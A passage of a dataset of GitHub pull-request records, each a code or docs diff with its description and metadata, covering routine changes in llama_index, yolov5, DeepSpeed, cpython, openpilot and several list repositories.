+ "2. Configure credentials of your [OpenAI](https://platform.openai.com) & [Zilliz Cloud](https://cloud.zilliz.com/signup?utm_source=twitter&utm_medium=social%20&utm_campaign=2023-12-22_social_pipeline-llamaindex_twitter) accounts."
]
},
{
@@ -53,7 +53,7 @@
"os.environ[\"OPENAI_API_KEY\"] = getpass(\"Enter your OpenAI API Key:\")\n",
"\n",
"ZILLIZ_CLUSTER_ID = getpass(\"Enter your Zilliz Cluster ID:\")\n",
- "ZILLIZ_TOKEN = getpass(\"Enter your Zilliz Token:\")"
+ "ZILLIZ_TOKEN = getpass(\"Enter your Zilliz API Key:\")"
]
},
{
@@ -65,7 +65,7 @@
"\n",
"### From Signed URL\n",
"\n",
- "Zilliz Cloud Pipeline is able to ingest & automatically index a document given a presigned url."
+ "Zilliz Cloud Pipelines accepts files from AWS S3 and Google Cloud Storage. You can generate a presigned url from the Object Storage and use `from_document_url()` or `insert_doc_url()` to ingest the file. It can automatically index the document and store the doc chunks as vectors on Zilliz Cloud."
]
},
{
@@ -78,10 +78,13 @@
"from llama_index.indices import ZillizCloudPipelineIndex\n",
"\n",
"zcp_index = ZillizCloudPipelineIndex.from_document_url(\n",
- " url=\"https://publicdataset.zillizcloud.com/milvus_doc.md\", # a public or pre-signed url of a file stored on s3 or gcs\n",
+ " # a public or pre-signed url of a file stored on AWS S3 or Google Cloud Storage\n",
+ " url=\"https://publicdataset.zillizcloud.com/milvus_doc.md\",\n",
" cluster_id=ZILLIZ_CLUSTER_ID,\n",
" token=ZILLIZ_TOKEN,\n",
- " metadata={\"version\": \"2.3\"},\n",
+ " # optional\n",
+ " metadata={\"version\": \"2.3\"}, # used for filtering\n",
+ " collection_name=\"zcp_llamalection\", # change this value will specify customized collection name\n",
")\n",
"\n",
"# Insert more docs, eg. a Milvus v2.2 document\n",
@@ -96,6 +99,8 @@
"id": "d16a498e",
"metadata": {},
"source": [
+ "- It is optional to add metadata for each document. The metadata can be used to filter doc chunks during retrieval.\n",
+ "\n",
"### From Local File\n",
"\n",
"Coming soon.\n",
@@ -112,13 +117,10 @@
"source": [
"## Working as Query Engine\n",
"\n",
- "A Zilliz Cloud Pipeline's Index can work as a Query Engine in LlamaIndex.\n",
- "It allows users to customize some parameters:\n",
- "- search_top_k: How many text nodes/chunks retrieved. Optional, defaults to `DEFAULT_SIMILARITY_TOP_K` (2).\n",
+ "To conduct semantic search with `ZillizCloudPipelineIndex`, you can use it `as_query_engine()` by specifying a few parameters:\n",
+ "- search_top_k: How many text nodes/chunks to retrieve. Optional, defaults to `DEFAULT_SIMILARITY_TOP_K` (2).\n",
"- filters: Metadata filters. Optional, defaults to None.\n",
- "- output_metadata: What metadata fields included in each retrieved text node. Optional, defaults to [].\n",
- "\n",
- "It is optional to apply filters. For example, if we want to ask about Milvus 2.3, then we can set version as 2.3 in filters."
+ "- output_metadata: What metadata fields to return with the retrieved text node. Optional, defaults to []."
]
},
{
@@ -128,13 +130,13 @@
"metadata": {},
"outputs": [],
"source": [
- "# # Get index without ingestion:\n",
+ "# # If you don't have zcp_index object and have an existing collection, you can construct it by:\n",
+ "#\n",
"# from llama_index.indices import ZillizCloudPipelineIndex\n",
- "\n",
"# zcp_index = ZillizCloudPipelineIndex(\n",
"# cluster_id=ZILLIZ_CLUSTER_ID,\n",
"# token=ZILLIZ_TOKEN,\n",
- "# # collection_name='zcp_llamalection'\n",
+ "# collection_name=\"zcp_llamalection\"\n",
"# )\n",
"\n",
"from llama_index.vector_stores.types import ExactMatchFilter, MetadataFilters\n",
@@ -157,7 +159,7 @@
"source": [
"Then the query engine is ready for Semantic Search or Retrieval Augmented Generation with Milvus 2.3 documents:\n",
"\n",
- "- **Retrieve** (Semantic search powered by Zilliz Cloud Pipeline's Index):"
+ "- **Retrieve** (Semantic search powered by Zilliz Cloud Pipelines):"
]
},
{
@@ -175,9 +177,7 @@
}
],
"source": [
- "question = \"Can users delete entities by filtering non-primary fields?\"\n",
- "retrieved_nodes = query_engine_milvus23.retrieve(question)\n",
- "print(retrieved_nodes)"
+ "> The query engine with filters retrieves only text nodes with \"version 2.3\" tag."
]
},
{
@@ -185,7 +185,7 @@
"id": "e91c5896",
"metadata": {},
"source": [
- "- **Query** (RAG powered by Zilliz Cloud Pipeline's Index & OpenAI's LLM):"
+ "- **Query** (RAG powered by Zilliz Cloud Pipelines as retriever and OpenAI's LLM):"
]
},
{
| # Description
Update description in docs/examples/managed/zcpDemo.ipynb
Fixes # (issue)
## Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] Added new unit/integration tests
- [ ] Added new notebook (that tests end-to-end)
- [ ] I stared at the code and made sure it makes sense
# Suggested Checklist:
- [ ] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation
- [ ] I have added Google Colab support for the newly added notebooks.
- [ ] My changes generate no new warnings
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] New and existing unit tests pass locally with my changes
- [ ] I ran `make format; make lint` to appease the lint gods
| https://api.github.com/repos/run-llama/llama_index/pulls/9840 | 2024-01-04T12:08:41Z | 2024-01-05T05:01:10Z | 2024-01-05T05:01:10Z | 2024-01-05T05:01:10Z | 2,328 | run-llama/llama_index | 6,284 |
Fix torch multi-GPU --device error | diff --git a/utils/torch_utils.py b/utils/torch_utils.py
index 6d3e6151d57..9908a6e7e96 100644
--- a/utils/torch_utils.py
+++ b/utils/torch_utils.py
@@ -75,13 +75,14 @@ def time_synchronized():
return time.time()
-def profile(x, ops, n=100, device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')):
+def profile(x, ops, n=100, device=None):
# profile a pytorch module or list of modules. Example usage:
# x = torch.randn(16, 3, 640, 640) # input
# m1 = lambda x: x * torch.sigmoid(x)
# m2 = nn.SiLU()
# profile(x, [m1, m2], n=100) # profile speed over 100 iterations
-
+
+ device = device or torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
x = x.to(device)
x.requires_grad = True
print(torch.__version__, device.type, torch.cuda.get_device_properties(0) if device.type == 'cuda' else '')
| Should fix https://github.com/ultralytics/yolov5/issues/1695
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
Improved device handling for profiling utility in YOLOv5.
### 📊 Key Changes
- Changed the default parameter of `device` from a static assignment to `None`.
- Dynamically setting the device inside the `profile` function if not provided.
### 🎯 Purpose & Impact
- 🛠️ **Flexibility**: This change allows the `profile` function to be more flexible by not forcing a predefined device, enhancing usability across different hardware.
- 💻 **Convenience**: Automatically selects the appropriate device (CPU or GPU), simplifying the function call for users.
- 🚀 **User-Friendly**: Potentially reduces errors for users who forget to specify a device, making the function more robust and user-friendly. | https://api.github.com/repos/ultralytics/yolov5/pulls/1701 | 2020-12-16T04:03:54Z | 2020-12-16T04:42:15Z | 2020-12-16T04:42:14Z | 2024-01-19T20:07:36Z | 276 | ultralytics/yolov5 | 25,028 |
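The patch above replaces a default argument evaluated at definition time with a lazy `device = device or ...` inside the function body. A torch-free sketch of the same idiom (the `gpu_available` probe is a hypothetical stand-in for `torch.cuda.is_available()`):

```python
def pick_device(requested=None):
    """Resolve a device at call time rather than at definition time.

    Mirrors the `device = device or torch.device(...)` pattern from the
    patch above; `gpu_available()` stands in for the CUDA probe.
    """
    def gpu_available():
        return False  # stand-in probe; the real code queries CUDA here

    # `or` falls through to the probe only when the caller passed nothing
    return requested or ("cuda:0" if gpu_available() else "cpu")

# A caller-supplied value wins; otherwise the probe runs at call time.
print(pick_device("cuda:1"))  # -> cuda:1
print(pick_device())          # -> cpu (probe returned False)
```

The subtlety is that with the old signature the default was evaluated once, when the module defining `profile` was imported — before any `--device` handling could take effect, which is how a multi-GPU run could pick the wrong device.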
ES.20: Fix typo | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index b9928bd0d..c1edeb390 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -10108,7 +10108,7 @@ Many such errors are introduced during maintenance years after the initial imple
##### Exception
-It you are declaring an object that is just about to be initialized from input, initializing it would cause a double initialization.
+If you are declaring an object that is just about to be initialized from input, initializing it would cause a double initialization.
However, beware that this may leave uninitialized data beyond the input -- and that has been a fertile source of errors and security breaches:
constexpr int max = 8 * 1024;
| https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/1033 | 2017-09-18T21:04:49Z | 2017-09-18T21:50:19Z | 2017-09-18T21:50:19Z | 2017-09-18T21:50:19Z | 172 | isocpp/CppCoreGuidelines | 15,723 | |
Update Passlib hyperlink in README.md | diff --git a/README.md b/README.md
index 92784dd0c..4481d9efa 100644
--- a/README.md
+++ b/README.md
@@ -332,7 +332,7 @@ Inspired by [awesome-php](https://github.com/ziadoz/awesome-php).
* [cryptography](https://cryptography.io/en/latest/) - A package designed to expose cryptographic primitives and recipes to Python developers.
* [hashids](https://github.com/davidaurelio/hashids-python) - Implementation of [hashids](http://hashids.org) in Python.
* [Paramiko](http://www.paramiko.org/) - A Python (2.6+, 3.3+) implementation of the SSHv2 protocol, providing both client and server functionality.
-* [Passlib](https://pythonhosted.org/passlib/) - Secure password storage/hashing library, very high level.
+* [Passlib](https://passlib.readthedocs.io/en/stable/) - Secure password storage/hashing library, very high level.
* [PyNacl](https://github.com/pyca/pynacl) - Python binding to the Networking and Cryptography (NaCl) library.
## Data Analysis
| Update outdated Passlib hyperlink. | https://api.github.com/repos/vinta/awesome-python/pulls/1086 | 2018-06-25T03:52:00Z | 2018-08-04T10:49:41Z | 2018-08-04T10:49:41Z | 2018-08-04T10:49:41Z | 263 | vinta/awesome-python | 27,024 |
turn excessive noise off | diff --git a/deepspeed/runtime/engine.py b/deepspeed/runtime/engine.py
index 770f961908f1..3437998e534e 100755
--- a/deepspeed/runtime/engine.py
+++ b/deepspeed/runtime/engine.py
@@ -2051,7 +2051,7 @@ def _copy_recovery_script(self, save_path):
script = "zero_to_fp32.py"
src = os.path.join(base_dir, "utils", script)
dst = os.path.join(save_path, script)
- logger.info(f"creating recovery script {dst}")
+ #logger.info(f"creating recovery script {dst}")
copyfile(src, dst)
# make executable
os.chmod(dst, os.stat(dst).st_mode | stat.S_IEXEC)
@@ -2064,7 +2064,7 @@ def _save_zero_checkpoint(self, save_path, tag):
ds_version=version)
torch.save(zero_sd, zero_checkpoint_name)
self._copy_recovery_script(save_path)
- logger.info('zero checkpoint saved {}'.format(zero_checkpoint_name))
+ #logger.info('zero checkpoint saved {}'.format(zero_checkpoint_name))
def _zero3_consolidated_fp16_state_dict(self):
"""
diff --git a/deepspeed/runtime/pipe/module.py b/deepspeed/runtime/pipe/module.py
index af4df2a10ebf..977ce599622f 100644
--- a/deepspeed/runtime/pipe/module.py
+++ b/deepspeed/runtime/pipe/module.py
@@ -577,10 +577,10 @@ def load_state_dir(self, load_dir, strict=True):
layer.load_state_dict(checkpoint)
- if self._grid.data_parallel_id == 0:
- logger.info(
- f'RANK={self.global_rank} Loaded layer={idx+self._local_start} file={load_path}'
- )
+ # if self._grid.data_parallel_id == 0:
+ # logger.info(
+ # f'RANK={self.global_rank} Loaded layer={idx+self._local_start} file={load_path}'
+ # )
self._synchronize_tied_weights()
diff --git a/deepspeed/runtime/state_dict_factory.py b/deepspeed/runtime/state_dict_factory.py
index 033b6726ddb3..f5562e141c3f 100755
--- a/deepspeed/runtime/state_dict_factory.py
+++ b/deepspeed/runtime/state_dict_factory.py
@@ -78,7 +78,7 @@ def load(self,
merge_count = 1
if num_ckpt == mp_world_size:
assert os.path.exists(load_path)
- logger.info(f'rank: {mp_rank} loading checkpoint: {load_path}')
+ #logger.info(f'rank: {mp_rank} loading checkpoint: {load_path}')
sd = torch.load(load_path, map_location=lambda storage, loc: storage)
if quantize:
@@ -158,7 +158,7 @@ def set_module(self, sd, module):
return sd
def check_ckpt_list(self):
- logger.info(f'checkpoint file list: {self.ckpt_list}')
+ #logger.info(f'checkpoint file list: {self.ckpt_list}')
assert len(self.ckpt_list) > 0
sd = torch.load(self.ckpt_list[0], map_location=lambda storage, loc: storage)
| not sure if you'd like that on the main branch, but turning some of the excessive noise off on the big-science branch. Thank you!
@tjruwase | https://api.github.com/repos/microsoft/DeepSpeed/pulls/1293 | 2021-08-10T04:42:51Z | 2021-08-11T12:20:38Z | 2021-08-11T12:20:38Z | 2021-08-11T12:20:38Z | 732 | microsoft/DeepSpeed | 10,546 |
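The patch above silences chatty `logger.info` calls by commenting them out. A common alternative — not what this PR does, just a hedged sketch with hypothetical names — is to demote such messages to `DEBUG`, so they stay recoverable by changing the log level instead of editing code:

```python
import logging

logger = logging.getLogger("sketch.checkpoint")
logging.basicConfig(level=logging.INFO)

def save_zero_checkpoint(path):
    # DEBUG instead of INFO: hidden by default, re-enabled via log level
    logger.debug("zero checkpoint saved %s", path)
    return path

save_zero_checkpoint("/tmp/ckpt.pt")   # silent at the default INFO level
logger.setLevel(logging.DEBUG)         # opt back in without a code change
save_zero_checkpoint("/tmp/ckpt.pt")   # now emitted
```

This keeps the messages available for debugging while achieving the same quiet default.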
chore(deps-dev): bump pylint from 2.4.4 to 2.7.0 | diff --git a/poetry.lock b/poetry.lock
index d9debe339..7aba1d892 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -8,17 +8,16 @@ python-versions = "*"
[[package]]
name = "astroid"
-version = "2.3.3"
+version = "2.5"
description = "An abstract syntax tree for Python with inference support."
category = "dev"
optional = false
-python-versions = ">=3.5.*"
+python-versions = ">=3.6"
[package.dependencies]
-lazy-object-proxy = ">=1.4.0,<1.5.0"
-six = ">=1.12,<2.0"
+lazy-object-proxy = ">=1.4.0"
typed-ast = {version = ">=1.4.0,<1.5", markers = "implementation_name == \"cpython\" and python_version < \"3.8\""}
-wrapt = ">=1.11.0,<1.12.0"
+wrapt = ">=1.11,<1.13"
[[package]]
name = "atomicwrites"
@@ -228,17 +227,21 @@ python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
[[package]]
name = "pylint"
-version = "2.4.4"
+version = "2.7.0"
description = "python code static checker"
category = "dev"
optional = false
-python-versions = ">=3.5.*"
+python-versions = "~=3.6"
[package.dependencies]
-astroid = ">=2.3.0,<2.4"
+astroid = "2.5.0"
colorama = {version = "*", markers = "sys_platform == \"win32\""}
-isort = ">=4.2.5,<5"
+isort = ">=4.2.5,<6"
mccabe = ">=0.6,<0.7"
+toml = ">=0.7.1"
+
+[package.extras]
+docs = ["sphinx (>=3.2,<4.0)", "python-docs-theme"]
[[package]]
name = "pyparsing"
@@ -286,14 +289,6 @@ category = "dev"
optional = false
python-versions = "*"
-[[package]]
-name = "six"
-version = "1.14.0"
-description = "Python 2 and 3 compatibility utilities"
-category = "dev"
-optional = false
-python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
-
[[package]]
name = "toml"
version = "0.10.0"
@@ -333,7 +328,7 @@ testing = ["jaraco.itertools", "func-timeout"]
[metadata]
lock-version = "1.1"
python-versions = "^3.6"
-content-hash = "6cb154d248e0d13adbb5229f52d1c1ab9ce2ea9cfe54091cf34cd97ccb822653"
+content-hash = "441f4ec509fbee3d303586c3abba92d71c5148600632f11c7069c709fa67774c"
[metadata.files]
appdirs = [
@@ -341,8 +336,8 @@ appdirs = [
{file = "appdirs-1.4.3.tar.gz", hash = "sha256:9e5896d1372858f8dd3344faf4e5014d21849c756c8d5701f78f8a103b372d92"},
]
astroid = [
- {file = "astroid-2.3.3-py3-none-any.whl", hash = "sha256:840947ebfa8b58f318d42301cf8c0a20fd794a33b61cc4638e28e9e61ba32f42"},
- {file = "astroid-2.3.3.tar.gz", hash = "sha256:71ea07f44df9568a75d0f354c49143a4575d90645e9fead6dfb52c26a85ed13a"},
+ {file = "astroid-2.5-py3-none-any.whl", hash = "sha256:87ae7f2398b8a0ae5638ddecf9987f081b756e0e9fc071aeebdca525671fc4dc"},
+ {file = "astroid-2.5.tar.gz", hash = "sha256:b31c92f545517dcc452f284bc9c044050862fbe6d93d2b3de4a215a6b384bf0d"},
]
atomicwrites = [
{file = "atomicwrites-1.3.0-py2.py3-none-any.whl", hash = "sha256:03472c30eb2c5d1ba9227e4c2ca66ab8287fbfbbda3888aa93dc2e28fc6811b4"},
@@ -503,8 +498,8 @@ py = [
{file = "py-1.10.0.tar.gz", hash = "sha256:21b81bda15b66ef5e1a777a21c4dcd9c20ad3efd0b3f817e7a809035269e1bd3"},
]
pylint = [
- {file = "pylint-2.4.4-py3-none-any.whl", hash = "sha256:886e6afc935ea2590b462664b161ca9a5e40168ea99e5300935f6591ad467df4"},
- {file = "pylint-2.4.4.tar.gz", hash = "sha256:3db5468ad013380e987410a8d6956226963aed94ecb5f9d3a28acca6d9ac36cd"},
+ {file = "pylint-2.7.0-py3-none-any.whl", hash = "sha256:3ea3926700db399765db1faf53860f11e4e981a090646e9eacd01ca78e020579"},
+ {file = "pylint-2.7.0.tar.gz", hash = "sha256:2e0c6749d809985e4f181c336a8f89b2b797340d8049160bf95f35a3f0ecf6fc"},
]
pyparsing = [
{file = "pyparsing-2.4.7-py2.py3-none-any.whl", hash = "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b"},
@@ -542,10 +537,6 @@ rope = [
{file = "rope-0.14.0-py3-none-any.whl", hash = "sha256:f0dcf719b63200d492b85535ebe5ea9b29e0d0b8aebeb87fe03fc1a65924fdaf"},
{file = "rope-0.14.0.tar.gz", hash = "sha256:c5c5a6a87f7b1a2095fb311135e2a3d1f194f5ecb96900fdd0a9100881f48aaf"},
]
-six = [
- {file = "six-1.14.0-py2.py3-none-any.whl", hash = "sha256:8f3cd2e254d8f793e7f3d6d9df77b92252b52637291d0f0da013c76ea2724b6c"},
- {file = "six-1.14.0.tar.gz", hash = "sha256:236bdbdce46e6e6a3d61a337c0f8b763ca1e8717c03b369e87a7ec7ce1319c0a"},
-]
toml = [
{file = "toml-0.10.0-py2.7.egg", hash = "sha256:f1db651f9657708513243e61e6cc67d101a39bad662eaa9b5546f789338e07a3"},
{file = "toml-0.10.0-py2.py3-none-any.whl", hash = "sha256:235682dd292d5899d361a811df37e04a8828a5b1da3115886b73cf81ebc9100e"},
diff --git a/pyproject.toml b/pyproject.toml
index 934b91ce5..54f2222f3 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -17,7 +17,7 @@ contextvars = { version = "^2.4", python = "~3.6" }
[tool.poetry.dev-dependencies]
pytest = "^6.2"
-pylint = "^2.4"
+pylint = "^2.7"
black = {version = "^19.0", allow-prereleases = true}
rope = "^0.14.0"
isort = "^4.3"
| Bumps [pylint](https://github.com/PyCQA/pylint) from 2.4.4 to 2.7.0.
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/PyCQA/pylint/blob/master/ChangeLog">pylint's changelog</a>.</em></p>
<blockquote>
<h1>What's New in Pylint 2.7.0?</h1>
<p>Release date: 2021-02-21</p>
<ul>
<li>
<p>Introduce DeprecationMixin for reusable deprecation checks.</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/4049">#4049</a></p>
</li>
<li>
<p>Fix false positive for <code>builtin-not-iterating</code> when <code>map</code> receives iterable</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/4078">#4078</a></p>
</li>
<li>
<p>Python 3.6+ is now required.</p>
</li>
<li>
<p>Fix false positive for <code>builtin-not-iterating</code> when <code>zip</code> receives iterable</p>
</li>
<li>
<p>Add <code>nan-comparison</code> check for NaN comparisons</p>
</li>
<li>
<p>Bug fix for empty-comment message line number.</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/4009">#4009</a></p>
</li>
<li>
<p>Only emit <code>bad-reversed-sequence</code> on dictionaries if below py3.8</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3940">#3940</a></p>
</li>
<li>
<p>Handle class decorators applied to function.</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3882">#3882</a></p>
</li>
<li>
<p>Add check for empty comments</p>
</li>
<li>
<p>Fix minor documentation issue in contribute.rst</p>
</li>
<li>
<p>Enums are now required to be named in UPPER_CASE by <code>invalid-name</code>.</p>
<p>Close <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3834">#3834</a></p>
</li>
<li>
<p>Add missing checks for deprecated functions.</p>
</li>
<li>
<p>Postponed evaluation of annotations are now recognized by default if python version is above 3.10</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3992">#3992</a></p>
</li>
<li>
<p>Fix column metadata for anomalous backslash lints</p>
</li>
<li>
<p>Drop support for Python 3.5</p>
</li>
<li>
<p>Add support for pep585 with postponed evaluation</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/PyCQA/pylint/commit/5e04ce74faa0142fe3ff99eec08479cfaeb9584c"><code>5e04ce7</code></a> Better documentation for the change in version during release</li>
<li><a href="https://github.com/PyCQA/pylint/commit/41d70221cdce96a209a479e349bdb70180bb5e8e"><code>41d7022</code></a> Upgrade the documentation about release</li>
<li><a href="https://github.com/PyCQA/pylint/commit/ac85223e5b8d0885d4717cec9499ab01bbd30fb6"><code>ac85223</code></a> Apply copyrite --contribution-threshold</li>
<li><a href="https://github.com/PyCQA/pylint/commit/6e2de8e3a2e2c5586e876ca305f0844bdd822db3"><code>6e2de8e</code></a> Upgrade version to 2.7.0 and fix astroid to 2.5.0</li>
<li><a href="https://github.com/PyCQA/pylint/commit/b9d9ca239c7f552abb3755cb04d73e3cd34e4530"><code>b9d9ca2</code></a> Edit highlights for 2.7.0 in whatsnew</li>
<li><a href="https://github.com/PyCQA/pylint/commit/ca110478acd0f0ad73b0ea20627d36402be401c8"><code>ca11047</code></a> Fix link to isort documentation in doc/faq.rst</li>
<li><a href="https://github.com/PyCQA/pylint/commit/ee910755b90af58d6aa9b908b5afe4310c5b26db"><code>ee91075</code></a> Migrate from % syntax or bad format() syntax to fstring</li>
<li><a href="https://github.com/PyCQA/pylint/commit/5bed07eba999130b6551acc7c43192d6a8eada43"><code>5bed07e</code></a> Move from % string formatting syntax to f-string or .format()</li>
<li><a href="https://github.com/PyCQA/pylint/commit/a1e553d3bb07c56ca99c31279f9af104bede0a32"><code>a1e553d</code></a> Add pyupgrade to the pre-commit configuration</li>
<li><a href="https://github.com/PyCQA/pylint/commit/154718cf610285be12cf72954ba7b88cda48eada"><code>154718c</code></a> Remove the # coding, since PEP3120 the default is UTF8</li>
<li>Additional commits viewable in <a href="https://github.com/PyCQA/pylint/compare/pylint-2.4.4...pylint-2.7.0">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/mingrammer/diagrams/pulls/470 | 2021-02-22T08:44:11Z | 2021-02-22T17:42:56Z | 2021-02-22T17:42:55Z | 2021-02-22T17:43:04Z | 2,120 | mingrammer/diagrams | 52,704 |
[3.11] gh-115652: Fix indentation in the documentation of multiprocessing.get_start_method (GH-115658) | diff --git a/Doc/library/multiprocessing.rst b/Doc/library/multiprocessing.rst
index 7745447065733f..3410e37e3abe1f 100644
--- a/Doc/library/multiprocessing.rst
+++ b/Doc/library/multiprocessing.rst
@@ -1065,13 +1065,13 @@ Miscellaneous
or ``None``. ``'fork'`` is the default on Unix, while ``'spawn'`` is
the default on Windows and macOS.
-.. versionchanged:: 3.8
+ .. versionadded:: 3.4
- On macOS, the *spawn* start method is now the default. The *fork* start
- method should be considered unsafe as it can lead to crashes of the
- subprocess. See :issue:`33725`.
+ .. versionchanged:: 3.8
- .. versionadded:: 3.4
+ On macOS, the *spawn* start method is now the default. The *fork* start
+ method should be considered unsafe as it can lead to crashes of the
+ subprocess. See :issue:`33725`.
.. function:: set_executable(executable)
| (cherry picked from commit d504968983c5cd5ddbdf73ccd3693ffb89e7952f)
Co-authored-by: Daniel Haag <121057143+denialhaag@users.noreply.github.com>
<!-- gh-issue-number: gh-115652 -->
* Issue: gh-115652
<!-- /gh-issue-number -->
<!-- readthedocs-preview cpython-previews start -->
----
📚 Documentation preview 📚: https://cpython-previews--115660.org.readthedocs.build/
<!-- readthedocs-preview cpython-previews end --> | https://api.github.com/repos/python/cpython/pulls/115660 | 2024-02-19T14:26:38Z | 2024-02-19T15:09:07Z | 2024-02-19T15:09:07Z | 2024-02-19T15:09:10Z | 270 | python/cpython | 4,781 |
Add image-charts API | diff --git a/README.md b/README.md
index ea31376728..c7996d50e1 100644
--- a/README.md
+++ b/README.md
@@ -248,6 +248,7 @@ API | Description | Auth | HTTPS | CORS |
| [Gitter](https://github.com/gitterHQ/docs) | Chat for GitHub | `OAuth` | Yes | Unknown |
| [HTTP2.Pro](https://http2.pro/doc/api) | Test endpoints for client and server HTTP/2 protocol support | No | Yes | Unknown |
| [IBM Text to Speech](https://console.bluemix.net/docs/services/text-to-speech/getting-started.html) | Convert text to speech | `apiKey` | Yes | Yes |
+| [Image-Charts](https://documentation.image-charts.com/) | Generate charts, QR codes and graph images | No | Yes | Yes |
| [import.io](http://api.docs.import.io/) | Retrieve structured data from a website or RSS feed | `apiKey` | Yes | Unknown |
| [IPify](https://www.ipify.org/) | A simple IP Address API | No | Yes | Unknown |
| [IPinfo](https://ipinfo.io/developers) | Another simple IP Address API | No | Yes | Unknown |
| Thank you for taking the time to work on a Pull Request for this project!
To ensure your PR is dealt with swiftly please check the following:
- [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md)
- [x] Your additions are ordered alphabetically
- [x] Your submission has a useful description
- [x] The description does not end with punctuation
- [x] Each table column should be padded with one space on either side
- [x] You have searched the repository for any relevant issues or pull requests
- [n/a] Any category you are creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
| https://api.github.com/repos/public-apis/public-apis/pulls/1004 | 2019-08-26T13:42:09Z | 2020-05-14T11:13:01Z | 2020-05-14T11:13:01Z | 2020-05-14T15:29:31Z | 276 | public-apis/public-apis | 35,466 |
replay: add nice arg parser | diff --git a/selfdrive/ui/replay/main.cc b/selfdrive/ui/replay/main.cc
index acc8b5d4d36157..be36d5f65d1769 100644
--- a/selfdrive/ui/replay/main.cc
+++ b/selfdrive/ui/replay/main.cc
@@ -3,8 +3,11 @@
#include <termios.h>
#include <QApplication>
+#include <QCommandLineParser>
#include <QThread>
+const QString DEMO_ROUTE = "3533c53bb29502d1|2019-12-10--01-13-27";
+
int getch() {
int ch;
struct termios oldt;
@@ -58,18 +61,28 @@ void keyboardThread(Replay *replay) {
int main(int argc, char *argv[]){
QApplication a(argc, argv);
- QString route(argv[1]);
- if (route == "") {
- printf("Usage: ./replay \"route\"\n");
- printf(" For a public demo route, use '3533c53bb29502d1|2019-12-10--01-13-27'\n");
- return 1;
+ QCommandLineParser parser;
+ parser.setApplicationDescription("Mock openpilot components by publishing logged messages.");
+ parser.addHelpOption();
+ parser.addPositionalArgument("route", "the drive to replay. find your drives at connect.comma.ai");
+ parser.addOption({{"a", "allow"}, "whitelist of services to send", "allow"});
+ parser.addOption({{"b", "block"}, "blacklist of services to send", "block"});
+ parser.addOption({"demo", "use a demo route instead of providing your own"});
+
+ parser.process(a);
+ const QStringList args = parser.positionalArguments();
+ if (args.empty() && !parser.isSet("demo")) {
+ parser.showHelp();
}
- Replay *replay = new Replay(route);
+ const QString route = args.empty() ? DEMO_ROUTE : args.first();
+ Replay *replay = new Replay(route, parser.value("allow").split(","), parser.value("block").split(","));
replay->start();
+ // start keyboard control thread
QThread *t = QThread::create(keyboardThread, replay);
QObject::connect(t, &QThread::finished, t, &QThread::deleteLater);
t->start();
+
return a.exec();
}
diff --git a/selfdrive/ui/replay/replay.cc b/selfdrive/ui/replay/replay.cc
index 3cef0bcd792a0a..6f76cd73d74b4b 100644
--- a/selfdrive/ui/replay/replay.cc
+++ b/selfdrive/ui/replay/replay.cc
@@ -8,13 +8,7 @@
#include "selfdrive/common/timing.h"
#include "selfdrive/hardware/hw.h"
-Replay::Replay(QString route, SubMaster *sm_, QObject *parent) : sm(sm_), QObject(parent) {
- QStringList block = QString(getenv("BLOCK")).split(",");
- qDebug() << "blocklist" << block;
-
- QStringList allow = QString(getenv("ALLOW")).split(",");
